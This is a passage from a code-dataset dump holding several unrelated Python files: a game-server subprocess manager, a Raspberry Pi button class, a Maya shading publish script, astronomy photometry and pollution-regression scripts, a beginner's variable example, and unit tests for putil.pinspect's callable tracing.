self._send_server_command(incmd)\n self._subprocess_commands = []\n\n # Request restarts/shut-downs for various reasons.\n self._request_shutdowns_or_restarts()\n\n # If they want to force-kill our subprocess, simply exit 
this\n # loop; the cleanup code will kill the process.\n if (self._subprocess_force_kill_time is not None\n and time.time() > self._subprocess_force_kill_time):\n print(f'{Clr.CYN}Force-killing subprocess...{Clr.RST}')\n break\n\n # Watch for the process exiting on its own..\n code: Optional[int] = self._subprocess.poll()\n if code is not None:\n if code == 0:\n clr = Clr.CYN\n slp = 0.0\n desc = ''\n elif code == 154:\n clr = Clr.CYN\n slp = 0.0\n desc = ' (idle_exit_minutes reached)'\n self._wrapper_shutdown_desired = True\n else:\n clr = Clr.SRED\n slp = 5.0 # Avoid super fast death loops.\n desc = ''\n print(f'{clr}Server subprocess exited'\n f' with code {code}{desc}.{Clr.RST}')\n self._reset_subprocess_vars()\n time.sleep(slp)\n break\n\n time.sleep(0.25)\n\n def _request_shutdowns_or_restarts(self) -> None:\n assert current_thread() is self._subprocess_thread\n assert self._subprocess_launch_time is not None\n sincelaunch = time.time() - self._subprocess_launch_time\n\n if (self._restart_minutes is not None and sincelaunch >\n (self._restart_minutes * 60.0)\n and not self._subprocess_sent_auto_restart):\n print(f'{Clr.CYN}restart_minutes ({self._restart_minutes})'\n f' elapsed; requesting subprocess'\n f' soft restart...{Clr.RST}')\n self.restart()\n self._subprocess_sent_auto_restart = True\n\n if self._config.clean_exit_minutes is not None:\n elapsed = (time.time() - self._launch_time) / 60.0\n if (elapsed > self._config.clean_exit_minutes\n and not self._subprocess_sent_clean_exit):\n print(f'{Clr.CYN}clean_exit_minutes'\n f' ({self._config.clean_exit_minutes})'\n f' elapsed; requesting subprocess'\n f' shutdown...{Clr.RST}')\n self.shutdown(immediate=False)\n self._subprocess_sent_clean_exit = True\n\n if self._config.unclean_exit_minutes is not None:\n elapsed = (time.time() - self._launch_time) / 60.0\n if (elapsed > self._config.unclean_exit_minutes\n and not self._subprocess_sent_unclean_exit):\n print(f'{Clr.CYN}unclean_exit_minutes'\n f' ({self._config.unclean_exit_minutes})'\n f' elapsed; requesting subprocess'\n f' shutdown...{Clr.RST}')\n self.shutdown(immediate=True)\n self._subprocess_sent_unclean_exit = True\n\n def _reset_subprocess_vars(self) -> None:\n self._subprocess = None\n self._subprocess_launch_time = None\n self._subprocess_sent_auto_restart = False\n self._subprocess_sent_clean_exit = False\n self._subprocess_sent_unclean_exit = False\n self._subprocess_force_kill_time = None\n\n def _kill_subprocess(self) -> None:\n \"\"\"End the server subprocess if it still exists.\"\"\"\n assert current_thread() is self._subprocess_thread\n if self._subprocess is None:\n return\n\n print(f'{Clr.CYN}Stopping subprocess...{Clr.RST}')\n\n # First, ask it nicely to die and give it a moment.\n # If that doesn't work, bring down the hammer.\n self._subprocess.terminate()\n try:\n self._subprocess.wait(timeout=10)\n except subprocess.TimeoutExpired:\n self._subprocess.kill()\n self._reset_subprocess_vars()\n print(f'{Clr.CYN}Subprocess stopped.{Clr.RST}')\n\n\ndef main() -> None:\n \"\"\"Run a BallisticaCore server manager in interactive mode.\"\"\"\n try:\n # ServerManager expects cwd to be the server dir (containing\n # dist/, config.yaml, etc.)\n # Let's change our working directory to the location of this file\n # so we can run this script from anywhere and it'll work.\n os.chdir(os.path.abspath(os.path.dirname(__file__)))\n\n ServerManagerApp().run_interactive()\n except CleanError as exc:\n # For clean errors, do a simple print and fail; no tracebacks/etc.\n 
exc.pretty_print()\n sys.exit(1)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"assets/src/server/ballisticacore_server.py","file_name":"ballisticacore_server.py","file_ext":"py","file_size_in_byte":21740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"633889046","text":"#!/usr/bin/env python3\n\nfrom RPi import GPIO\n\n\nclass Button:\n def __init__(self, button: str):\n \"\"\"\n Accepted values: 'left', 'right'.\n \"\"\"\n if button == \"left\":\n self.button = 17\n elif button == \"right\":\n self.button = 26\n else:\n raise ValueError(\"Invalid button name, allowed: 'left', 'right'.\")\n GPIO.setmode(GPIO.BCM)\n GPIO.setup(self.button, GPIO.IN)\n\n def pressed(self) -> bool:\n \"\"\"\n Get button status (bool), check if is pressed.\n \"\"\"\n if not GPIO.input(self.button):\n return True\n else:\n return False\n","sub_path":"ZeroSeg/buttons.py","file_name":"buttons.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"525293383","text":"# -*- coding: utf-8 -*-\nimport optparse\nimport logging\nimport maya.cmds as mc\nfrom miraLibs.pipeLibs import pipeFile\nfrom miraLibs.mayaLibs import open_file, quit_maya, export_selected, \\\n delete_history, delete_unused_nodes, delete_layer, \\\n get_selected_group_sg, get_shader_history_nodes, remove_namespace\nfrom miraLibs.pipeLibs.pipeMaya import rename_pipeline_shape, publish, get_model_name\n\n\ndef get_created_sg_node():\n exclude_sg = [\"initialParticleSE\", \"initialShadingGroup\"]\n sg_nodes = get_selected_group_sg.get_selected_group_sg()\n created_sg = list(set(sg_nodes)-set(exclude_sg))\n return created_sg\n\n\ndef get_prefix(context):\n asset_name = context.asset_name\n task = context.task\n prefix = asset_name+\"_\"+task+\"_\"\n return prefix\n\n\ndef rename_shd_mat_node(context):\n prefix = get_prefix(context)\n created_sg = get_created_sg_node()\n if not created_sg:\n return\n for sg in created_sg:\n material_nodes = get_shader_history_nodes.get_shader_history_nodes(sg)\n for node in material_nodes:\n if node.startswith(prefix):\n continue\n try:\n new_name = \"%s%s\" % (prefix, node)\n mc.rename(node, new_name)\n except:\n pass\n\n\ndef main():\n logger = logging.getLogger(\"shd publish\")\n file_path = options.file\n open_file.open_file(file_path)\n # get paths\n context = pipeFile.PathDetails.parse_path(file_path)\n publish_path = context.publish_path\n # import all reference\n publish.reference_opt()\n logger.info(\"Import all reference.\")\n # delete history and delete unused nodes\n delete_history.delete_history()\n delete_unused_nodes.delete_unused_nodes()\n # remove namespace\n remove_namespace.remove_namespace()\n logger.info(\"Remove namespace done.\")\n # rename mat node\n model_name = get_model_name.get_model_name()\n mc.select(model_name, r=1)\n rename_shd_mat_node(context)\n logger.info(\"Rename material name done.\")\n # rename shape\n if not rename_pipeline_shape.rename_pipeline_shape():\n raise RuntimeError(\"Rename shape error.\")\n logger.info(\"Rename shape done.\")\n # export _MODEL to publish path\n delete_layer.delete_layer()\n export_selected.export_selected(publish_path)\n logger.info(\"Save to %s\" % publish_path)\n # add to AD\n publish.add_mesh_to_ad(context)\n logger.info(\"Add to AD done.\")\n quit_maya.quit_maya()\n\n\nif __name__ == \"__main__\":\n parser = optparse.OptionParser()\n parser.add_option(\"-f\", dest=\"file\", help=\"maya file ma 
or mb.\", metavar=\"string\")\n parser.add_option(\"-c\", dest=\"command\",\n help=\"Not a needed argument, just for mayabatch.exe, \" \\\n \"if missing this setting, optparse would \" \\\n \"encounter an error: \\\"no such option: -c\\\"\",\n metavar=\"string\")\n options, args = parser.parse_args()\n if len([i for i in [\"file_name\"] if i in dir()]) == 1:\n options.file = file_name\n main()\n","sub_path":"miraPipeline/maya/publish/shd_publish.py","file_name":"shd_publish.py","file_ext":"py","file_size_in_byte":3068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"557562019","text":"import os\nfrom glob import glob\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport astropy.units as u\nfrom astropy.stats import mad_std\n\nfrom toolkit import (photometry, transit_model_b,\n PhotometryResults, PCA_light_curve, params_b)\n\n# Image paths\nimage_paths = sorted(glob('/Users/brettmorris/data/rem/20190829/IMG*UR*.fits'))\nmaster_flat_path = 'outputs/master_flat_s_201906_UR_g_1s_norm.fits'\nmaster_dark_path = 'outputs/masterdark.fits'\n\n# dark = np.zeros_like(fits.getdata(image_paths[0]))\n# fits.writeto(master_dark_path, dark)\n\n# Photometry settings\naperture_radii = np.arange(15, 30)\ncentroid_stamp_half_width = 10\npsf_stddev_init = 2\naperture_annulus_radius = 50\ntransit_parameters = params_b\nstar_positions = [[465, 359],\n [707, 528]]\noutput_path = 'outputs/20190831ur.npz'\nforce_recompute_photometry = False #True\n\n# Do photometry:\n\nif not os.path.exists(output_path) or force_recompute_photometry:\n print('Calculating photometry:')\n phot_results = photometry(image_paths, master_dark_path, master_flat_path,\n star_positions,\n aperture_radii, centroid_stamp_half_width,\n psf_stddev_init, aperture_annulus_radius,\n output_path)\n\nelse:\n phot_results = PhotometryResults.load(output_path)\n\nstds = []\nlcs = []\nfor ap in range(phot_results.fluxes.shape[2]):\n regressors = np.vstack([phot_results.fluxes[:, 1, ap],\n phot_results.xcentroids[:, 0] - phot_results.xcentroids[:, 0].mean(),\n phot_results.ycentroids[:, 0] - phot_results.ycentroids[:, 0].mean(),\n phot_results.airmass,\n phot_results.background_median]).T\n\n target_lc = phot_results.fluxes[:, 0, ap]\n\n y = np.linalg.lstsq(regressors, target_lc, rcond=None)[0]\n comp_lc = regressors @ y\n lc = target_lc/comp_lc\n stds.append(mad_std(lc))\n lcs.append(lc)\n\nbest_ap = np.argmin(stds)\nbest_lc = lcs[best_ap]\n\nnp.save('outputs/20190831_g.npy', best_lc)\n\nfig, ax = plt.subplots(4, 1, figsize=(10, 5))\nax[0].plot(phot_results.times, best_lc, '.')\nax[1].set_ylabel('X')\nax[1].plot(phot_results.times, phot_results.xcentroids[:, 0], '.')\nax[1].plot(phot_results.times, phot_results.xcentroids[:, 1], '.')\n\nax[2].set_ylabel('Y')\nax[2].plot(phot_results.times, phot_results.ycentroids[:, 0], '.')\nax[2].plot(phot_results.times, phot_results.ycentroids[:, 1], '.')\n\nax[3].set_ylabel('Flux')\nax[3].plot(phot_results.times, phot_results.fluxes[:, 0, best_ap], '.')\nax[3].plot(phot_results.times, phot_results.fluxes[:, 1, best_ap], '.')\nplt.show()\n\n","sub_path":"20190831_ur.py","file_name":"20190831_ur.py","file_ext":"py","file_size_in_byte":2697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"435320805","text":"import csv\nimport numpy as np\nfrom sklearn import linear_model\nimport matplotlib.pyplot as plt\n\nhour = []\npollution = []\n\ndef get_data(filename):\n with open(filename, 'r') as csvfile:\n 
csvFileReader = csv.reader(csvfile)\n next(csvFileReader)\n for row in csvFileReader:\n hour.append(int(row[4]))\n pollution.append(int(row[5]))\n return\n\ndef predict_pollution(hour, pollution, x):\n model = linear_model.LinearRegression()\n hour = np.reshape(hour, (len(hour), 1))\n pollution = np.reshape(pollution, (len(pollution), 1))\n model.fit(hour, pollution)\n pollution_predict = model.predict(hour)\n\n plt.scatter(hour, pollution, color='black')\n plt.plot(hour, pollution_predict, color='yellow', linewidth=2)\n plt.show()\n result = model.predict([[x]])\n return result[0][0]\n\n\n\nget_data('PRSA_data_2010.1.1-2014.12.31.csv')\nprediction = predict_pollution(hour,pollution,12.5)\nprint(\"predicted PM2.5 at 12:30 is:%f\"%prediction)\n\n","sub_path":"Lab3/source/task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"400500132","text":"# variable\n\n# integer\na = 5\n\n# casting Integer to String\na1 = str(5)\nprint(a1)\n\n# string\nb = 'hello'\n\n# float\nc = 19.005\n\n# casting float to Integer\nc1 = int(c)\nprint(c1)\n\n# complex\nd = 5+6j\n\n# boolean\ne = True\n","sub_path":"variable.py","file_name":"variable.py","file_ext":"py","file_size_in_byte":211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"572311141","text":"# test_pinspect.py\n# Copyright (c) 2013-2016 Pablo Acosta-Serafini\n# See LICENSE for details\n# pylint: disable=C0103,C0111,E0611,F0401,R0201,R0903,R0913,R0915,W0104,W0212,W0232,W0612,W0613,W0621\n\n# Standard library imports\nfrom __future__ import print_function\nfrom functools import partial\nimport copy\nimport os\nimport sys\nimport time\nimport types\n# PyPI imports\nimport pytest\nif sys.hexversion == 0x03000000:\n from putil.compat3 import _readlines\n# Putil imports\nimport putil.pinspect\nfrom putil.test import AE, AI, CS, GET_EXMSG, RE\n\n\n###\n# Helper functions\n###\nmodfile = lambda x: sys.modules[x].__file__\n\n\n###\n# Tests for module functions\n###\ndef test_private_props():\n \"\"\" Test private_props function behavior \"\"\"\n obj = putil.pinspect.Callables()\n assert sorted(list(putil.pinspect.private_props(obj))) == [\n '_callables_db',\n '_class_names',\n '_fnames',\n '_module_names',\n '_modules_dict',\n '_reverse_callables_db'\n ]\n\n\nif sys.hexversion == 0x03000000:\n def test_readlines():\n \"\"\" Test _readlines function behavior \"\"\"\n def mopen1(fname, mode):\n raise RuntimeError('Mock mopen1 function')\n def mopen2(fname, mode):\n text = chr(40960) + 'abcd' + chr(1972)\n # Next line raises UnicodeDecodeError\n b'\\x80abc'.decode(\"utf-8\", \"strict\")\n class MockOpenCls(object):\n def __init__(self, fname, mode, encoding):\n pass\n def __enter__(self):\n return self\n def __exit__(self, exc_type, exc_value, exc_tb):\n if exc_type is not None:\n return False\n def readlines(self):\n return 'MockOpenCls'\n pkg_dir = os.path.abspath(os.path.dirname(__file__))\n fname = os.path.join(pkg_dir, 'test_misc.py')\n # This should not trigger an exception (functionality checked\n # by other unit tests)\n _readlines(fname)\n # Trigger unrelated exception\n obj = _readlines\n with pytest.raises(RuntimeError) as excinfo:\n _readlines(fname, mopen1)\n assert GET_EXMSG(excinfo) == 'Mock mopen1 function'\n # Trigger UnicodeDecodeError exception\n assert _readlines(fname, mopen2, MockOpenCls) == 'MockOpenCls'\n\n\ndef test_object_is_module():\n \"\"\" Test 
object_is_module() function \"\"\"\n assert not putil.pinspect.is_object_module(5)\n assert putil.pinspect.is_object_module(sys.modules['putil.pinspect'])\n\n\ndef test_get_module_name():\n \"\"\" Test get_module_name() function \"\"\"\n obj = putil.pinspect.get_module_name\n AI(obj, 'module_obj', module_obj=5)\n mock_module_obj = types.ModuleType('mock_module_obj', 'Mock module')\n exmsg = (\n 'Module object `mock_module_obj` could not be found in loaded modules'\n )\n AE(obj, RE, exmsg, module_obj=mock_module_obj)\n ref = 'putil.pinspect'\n assert putil.pinspect.get_module_name(sys.modules[ref]) == ref\n assert putil.pinspect.get_module_name(sys.modules['putil']) == 'putil'\n\n\ndef test_get_module_name_from_fname():\n \"\"\" Test _get_module_name_from_fname() function \"\"\"\n obj = putil.pinspect._get_module_name_from_fname\n AE(obj, RE, 'Module could not be found', fname='_not_a_module')\n assert obj(modfile('putil.pinspect')) == 'putil.pinspect'\n\n\ndef test_is_special_method():\n \"\"\" Test is_special_method() function \"\"\"\n assert not putil.pinspect.is_special_method('func_name')\n assert not putil.pinspect.is_special_method('_func_name_')\n assert putil.pinspect.is_special_method('__func_name__')\n\n\n###\n# Test for classes\n###\nclass TestCallables(object):\n \"\"\" Test for Callables \"\"\"\n def test_check_intersection(self):\n \"\"\" Test _check_intersection method behavior \"\"\"\n obj1 = putil.pinspect.Callables()\n obj1._callables_db = {'call1':1, 'call2':2}\n obj2 = putil.pinspect.Callables()\n obj2._callables_db = {'call1':1, 'call2':'a'}\n exmsg = 'Conflicting information between objects'\n obj = obj1._check_intersection\n AE(obj, RE, exmsg, other=obj2)\n obj1._callables_db = {'call1':1, 'call2':['a', 'c']}\n obj2._callables_db = {'call1':1, 'call2':['a', 'b']}\n AE(obj, RE, exmsg, other=obj2)\n obj1._callables_db = {'call1':1, 'call2':{'a':'b'}}\n obj2._callables_db = {'call1':1, 'call2':{'a':'c'}}\n AE(obj, RE, exmsg, other=obj2)\n obj1._callables_db = {'call1':1, 'call2':'a'}\n obj2._callables_db = {'call1':1, 'call2':'c'}\n AE(obj, RE, exmsg, other=obj2)\n obj1._callables_db = {'call1':1, 'call2':'a'}\n obj2._callables_db = {'call1':1, 'call2':'a'}\n assert obj1._check_intersection(obj2) is None\n\n def test_init_exceptions(self):\n \"\"\" Test constructor exceptions \"\"\"\n obj = putil.pinspect.Callables\n for item in [5, [5]]:\n AI(obj, 'fnames', fnames=item)\n exmsg = 'File _not_a_file_ could not be found'\n AE(obj, OSError, exmsg, fnames=['_not_a_file_'])\n\n def test_add(self):\n \"\"\" Test __add__ __radd__ method behavior \"\"\"\n obj1 = putil.pinspect.Callables()\n obj1._callables_db = {'call1':{'a':5, 'b':6}, 'call2':{'a':7, 'b':8}}\n obj1._reverse_callables_db = {'rc1':'5', 'rc2':'7'}\n obj1._modules_dict = {\n 'key1':{'entry':'alpha'}, 'key2':{'entry':'beta'}\n }\n obj1._fnames = {'hello':0}\n obj1._module_names = ['this', 'is']\n obj1._class_names = ['once', 'upon']\n #\n obj2 = putil.pinspect.Callables()\n obj2._callables_db = {\n 'call3':{'a':10, 'b':100}, 'call4':{'a':200, 'b':300}\n }\n obj2._reverse_callables_db = {'rc3':'0', 'rc4':'1'}\n obj2._modules_dict = {'key3':{'entry':'pi'}, 'key4':{'entry':'gamma'}}\n obj2._fnames = {'world':1}\n obj2._module_names = ['a', 'test']\n obj2._class_names = ['a', 'time']\n #\n obj1._callables_db = {'call3':{'a':5, 'b':6}, 'call2':{'a':7, 'b':8}}\n with pytest.raises(RuntimeError) as excinfo:\n obj1+obj2\n assert GET_EXMSG(excinfo) == 'Conflicting information between objects'\n obj1._callables_db = 
{'call1':{'a':5, 'b':6}, 'call2':{'a':7, 'b':8}}\n #\n obj2._reverse_callables_db = {'rc3':'5', 'rc2':'-1'}\n with pytest.raises(RuntimeError) as excinfo:\n obj1+obj2\n assert GET_EXMSG(excinfo) == 'Conflicting information between objects'\n obj2._reverse_callables_db = {'rc3':'0', 'rc4':'-1'}\n #\n obj2._modules_dict = {'key1':{'entry':'pi'}, 'key4':{'entry':'gamma'}}\n with pytest.raises(RuntimeError) as excinfo:\n obj1+obj2\n assert GET_EXMSG(excinfo) == 'Conflicting information between objects'\n obj2._modules_dict = {'key3':{'entry':'pi'}, 'key4':{'entry':'gamma'}}\n # Test when intersection is the same\n obj2._modules_dict = {\n 'key1':{'entry':'alpha'}, 'key4':{'entry':'gamma'}\n }\n obj1+obj2\n obj2._modules_dict = {'key3':{'entry':'pi'}, 'key4':{'entry':'gamma'}}\n #\n sobj = obj1+obj2\n scomp = lambda x, y: sorted(x) == sorted(y)\n ref = {\n 'call1':{'a':5, 'b':6},\n 'call2':{'a':7, 'b':8},\n 'call3':{'a':10, 'b':100},\n 'call4':{'a':200, 'b':300}\n }\n assert scomp(sobj._callables_db, ref)\n ref = {'rc1':'5', 'rc2':'7', 'rc3':'0', 'rc4':'-1'}\n assert scomp(sobj._reverse_callables_db, ref)\n ref = {\n 'key1':{'entry':'alpha'},\n 'key2':{'entry':'beta'},\n 'key3':{'entry':'pi'},\n 'key4':{'entry':'gamma'}\n }\n assert scomp(sobj._modules_dict, ref)\n assert scomp(sobj._fnames, {'hello':0, 'world':1})\n assert scomp(sobj._module_names, ['this', 'is', 'a', 'test'])\n assert scomp(sobj._class_names, ['once', 'upon', 'a', 'time'])\n #\n obj1 += obj2\n ref = {\n 'call1':{'a':5, 'b':6},\n 'call2':{'a':7, 'b':8},\n 'call3':{'a':10, 'b':100},\n 'call4':{'a':200, 'b':300}\n }\n assert scomp(obj1._callables_db, ref)\n ref = {'rc1':'5', 'rc2':'7', 'rc3':'0', 'rc4':'-1'}\n assert scomp(obj1._reverse_callables_db, ref)\n ref = {\n 'key1':{'entry':'alpha'},\n 'key2':{'entry':'beta'},\n 'key3':{'entry':'pi'},\n 'key4':{'entry':'gamma'}\n }\n assert scomp(obj1._modules_dict, ref)\n assert scomp(obj1._fnames, {'hello':0, 'world':1})\n assert scomp(obj1._module_names, ['this', 'is', 'a', 'test'])\n assert scomp(obj1._class_names, ['once', 'upon', 'a', 'time'])\n\n def test_copy(self):\n \"\"\" Test __copy__ method behavior \"\"\"\n sobj = putil.pinspect.Callables()\n import tests.support.pinspect_support_module_1\n sobj.trace([modfile('tests.support.pinspect_support_module_1')])\n dobj = copy.copy(sobj)\n assert sobj._module_names == dobj._module_names\n assert id(sobj._module_names) != id(dobj._module_names)\n assert sobj._class_names == dobj._class_names\n assert id(sobj._class_names) != id(dobj._class_names)\n assert sobj._callables_db == dobj._callables_db\n assert id(sobj._callables_db) != id(dobj._callables_db)\n assert sobj._reverse_callables_db == dobj._reverse_callables_db\n assert id(sobj._reverse_callables_db) != id(dobj._reverse_callables_db)\n\n def test_eq(self):\n \"\"\" Test __eq__ method behavior \"\"\"\n obj1 = putil.pinspect.Callables()\n obj2 = putil.pinspect.Callables()\n obj3 = putil.pinspect.Callables()\n import tests.support.pinspect_support_module_1\n import tests.support.pinspect_support_module_2\n mname = 'tests.support.pinspect_support_module_1'\n obj1.trace([modfile(mname)])\n obj2.trace([modfile(mname)])\n obj3.trace([modfile('putil.test')])\n assert (obj1 == obj2) and (obj1 != obj3)\n assert obj1 != 5\n\n def test_repr(self):\n \"\"\" Test __repr__ method behavior \"\"\"\n get_name = lambda x: modfile(x).replace('.pyc', '.py')\n import tests.support.exdoc_support_module_1\n file1 = get_name('tests.support.exdoc_support_module_1')\n file2 = 
get_name('tests.support.exdoc_support_module_2')\n xobj = putil.pinspect.Callables([file2])\n xobj.trace([file1])\n ref = \"putil.pinspect.Callables([{0}, {1}])\".format(\n repr(file1), repr(file2)\n )\n assert repr(xobj) == ref\n\n def test_str_empty(self):\n \"\"\" Test __str__ magic method when object is empty \"\"\"\n obj = putil.pinspect.Callables()\n assert str(obj) == ''\n\n def test_refresh(self):\n \"\"\" Test refresh method behavior \"\"\"\n ref = modfile('putil.test')\n src = os.path.join(os.path.dirname(ref), 'pit.py')\n with open(src, 'w') as fobj:\n fobj.write(\n 'class MyClass(object):\\n'\n ' pass\\n'\n 'def func1():\\n'\n ' pass\\n'\n )\n import putil.pit\n obj = putil.pinspect.Callables([ref, src])\n tmod = obj._fnames[src]\n obj.trace([src])\n assert obj._fnames[src] == tmod\n rtext = (\n 'Modules:\\n'\n ' putil.pit\\n'\n ' putil.test\\n'\n 'Classes:\\n'\n ' putil.pit.MyClass\\n'\n 'putil.pit.MyClass: class (1-2)\\n'\n 'putil.pit.func1: func (3-4)\\n'\n 'putil.test._get_fargs: func (32-67)\\n'\n 'putil.test._pcolor: func (68-82)\\n'\n 'putil.test.assert_arg_invalid: func (83-115)\\n'\n 'putil.test.assert_exception: func (116-199)\\n'\n 'putil.test._invalid_frame: func (200-206)\\n'\n 'putil.test.assert_prop: func (207-246)\\n'\n 'putil.test.assert_ro_prop: func (247-266)\\n'\n 'putil.test.compare_strings: func (267-356)\\n'\n 'putil.test.compare_strings.colorize_lines: func (296-307)\\n'\n 'putil.test.compare_strings.print_non_diff: func (308-312)\\n'\n 'putil.test.compare_strings.print_diff: func (313-321)\\n'\n 'putil.test.comp_list_of_dicts: func (357-371)\\n'\n 'putil.test.exception_type_str: func (372-389)\\n'\n 'putil.test.get_exmsg: func (390-404)'\n )\n CS(str(obj), rtext)\n ftime = int(os.path.getmtime(src))\n while int(time.time()) <= ftime:\n time.sleep(0.1)\n os.remove(src)\n content = 'def my_func():\\n pass'\n with open(src, 'w') as fobj:\n fobj.write(content)\n obj.refresh()\n assert obj._fnames[src] != tmod\n rtext = (\n 'Modules:\\n'\n ' putil.pit\\n'\n ' putil.test\\n'\n 'putil.pit.my_func: func (1-2)\\n'\n 'putil.test._get_fargs: func (32-67)\\n'\n 'putil.test._pcolor: func (68-82)\\n'\n 'putil.test.assert_arg_invalid: func (83-115)\\n'\n 'putil.test.assert_exception: func (116-199)\\n'\n 'putil.test._invalid_frame: func (200-206)\\n'\n 'putil.test.assert_prop: func (207-246)\\n'\n 'putil.test.assert_ro_prop: func (247-266)\\n'\n 'putil.test.compare_strings: func (267-356)\\n'\n 'putil.test.compare_strings.colorize_lines: func (296-307)\\n'\n 'putil.test.compare_strings.print_non_diff: func (308-312)\\n'\n 'putil.test.compare_strings.print_diff: func (313-321)\\n'\n 'putil.test.comp_list_of_dicts: func (357-371)\\n'\n 'putil.test.exception_type_str: func (372-389)\\n'\n 'putil.test.get_exmsg: func (390-404)'\n )\n CS(str(obj), rtext)\n ## Test malformed JSON file\n obj = putil.pinspect.Callables()\n json_src = os.path.join(os.path.dirname(ref), 'pit.json')\n json_txt = (\n '{{\\n'\n ' \"_callables_db\": {{\\n'\n ' \"putil.pit.my_func\": {{\\n'\n ' \"code_id\": [\\n'\n ' \"{pyfile}\",\\n'\n ' 1\\n'\n ' ],\\n'\n ' \"last_lineno\": 2,\\n'\n ' \"name\": \"putil.pit.my_func\",\\n'\n ' \"type\": \"func\"\\n'\n ' }}\\n'\n ' }},\\n'\n ' \"_class_names\": [],\\n'\n ' \"_fnames\": {{\\n'\n ' \"{pyfile}\": {{\\n'\n ' \"classes\": [],\\n'\n ' \"date\": 1,\\n'\n ' \"name\": \"putil.pit\"\\n'\n ' }}\\n'\n ' }},\\n'\n ' \"_module_names\": [\\n'\n ' \"putil.pit\"\\n'\n ' ],\\n'\n ' \"_modules_dict\": {{\\n'\n ' \"putil.pit\": [\\n'\n ' {{\\n'\n ' \"code_id\": [\\n'\n 
' \"{pyfile}\",\\n'\n ' 1\\n'\n ' ],\\n'\n ' \"last_lineno\": 2,\\n'\n ' \"name\": \"putil.pit.my_func\",\\n'\n ' \"type\": \"func\"\\n'\n ' }}\\n'\n ' ]\\n'\n ' }},\\n'\n ' \"_reverse_callables_db\": {{\\n'\n ' \"(\\'{pyfile}\\', 1)\": \"putil.pit.my_func\",\\n'\n ' \"(\\'{pyfile}\\', 10)\": \"putil.pit.my_func\"\\n'\n ' }}\\n'\n '}}\\n'\n )\n with open(json_src, 'w') as fobj:\n fobj.write(json_txt.format(pyfile=src.replace('\\\\', '/')))\n obj.load(json_src)\n obj.refresh()\n os.remove(json_src)\n os.remove(src)\n\n def test_load_save(self):\n \"\"\" Test load and save methods behavior \"\"\"\n # pylint: disable=R0914\n import putil.pcsv\n import tests.support.exdoc_support_module_1\n # Empty object\n obj1 = putil.pinspect.Callables()\n with putil.misc.TmpFile() as fname:\n obj1.save(fname)\n obj2 = putil.pinspect.Callables()\n obj2.load(fname)\n assert obj1 == obj2\n # 1 module trace\n mname = 'putil.pcsv.csv_file'\n cname = '{0}.CsvFile'.format(mname)\n obj1 = putil.pinspect.Callables([modfile(mname)])\n with putil.misc.TmpFile() as fname:\n obj1.save(fname)\n obj2 = putil.pinspect.Callables()\n assert not bool(obj2)\n obj2.load(fname)\n assert obj1 == obj2\n # Test merging of traced and file-based module information\n mname1 = 'putil.pcsv.csv_file'\n obj1 = putil.pinspect.Callables([modfile(mname1)])\n mname2 = 'tests.support.exdoc_support_module_1'\n obj2 = putil.pinspect.Callables([modfile(mname2)])\n with putil.misc.TmpFile() as fname1:\n with putil.misc.TmpFile() as fname2:\n obj1.save(fname1)\n obj2.save(fname2)\n obj3 = putil.pinspect.Callables(\n [modfile(mname1), modfile(mname2)]\n )\n obj4 = putil.pinspect.Callables()\n obj4.load(fname2)\n obj4.load(fname1)\n assert obj3 == obj4\n\n def test_load_exceptions(self):\n \"\"\" Test load method exceptions \"\"\"\n obj = putil.pinspect.Callables()\n for item in [True, 5]:\n AI(obj.load, 'callables_fname', callables_fname=item)\n exmsg = 'File _not_a_file_ could not be found'\n AE(obj.load, OSError, exmsg, callables_fname='_not_a_file_')\n\n def test_save_exceptions(self):\n \"\"\" Test save method exceptions \"\"\"\n obj = putil.pinspect.Callables()\n for item in [True, 5]:\n AI(obj.save, 'callables_fname', callables_fname=item)\n\n def test_trace(self):\n \"\"\" Test trace method behavior \"\"\"\n import putil.pcsv\n mname = 'putil.pcsv.csv_file'\n cname = '{0}.CsvFile'.format(mname)\n xobj = putil.pinspect.Callables([modfile(mname)])\n ref = []\n ref.append('Modules:')\n ref.append(' {0}'.format(mname))\n ref.append('Classes:')\n ref.append(' {0}'.format(cname))\n ref.append('{0}._homogenize_data_filter: func (44-66)'.format(mname))\n ref.append('{0}._tofloat: func (67-82)'.format(mname))\n ref.append('{0}: class (83-958)'.format(cname))\n ref.append('{0}.__init__: meth (134-207)'.format(cname))\n ref.append('{0}.__eq__: meth (208-242)'.format(cname))\n ref.append('{0}.__repr__: meth (243-276)'.format(cname))\n ref.append('{0}.__str__: meth (277-321)'.format(cname))\n ref.append('{0}._format_rfilter: meth (322-338)'.format(cname))\n ref.append('{0}._gen_col_index: meth (339-351)'.format(cname))\n ref.append('{0}._get_cfilter: meth (352-354)'.format(cname))\n ref.append('{0}._get_dfilter: meth (355-357)'.format(cname))\n ref.append('{0}._get_rfilter: meth (358-360)'.format(cname))\n ref.append('{0}._reset_dfilter_int: meth (361-366)'.format(cname))\n ref.append('{0}._in_header: meth (367-401)'.format(cname))\n ref.append('{0}._set_cfilter: meth (402-406)'.format(cname))\n ref.append('{0}._set_dfilter: meth 
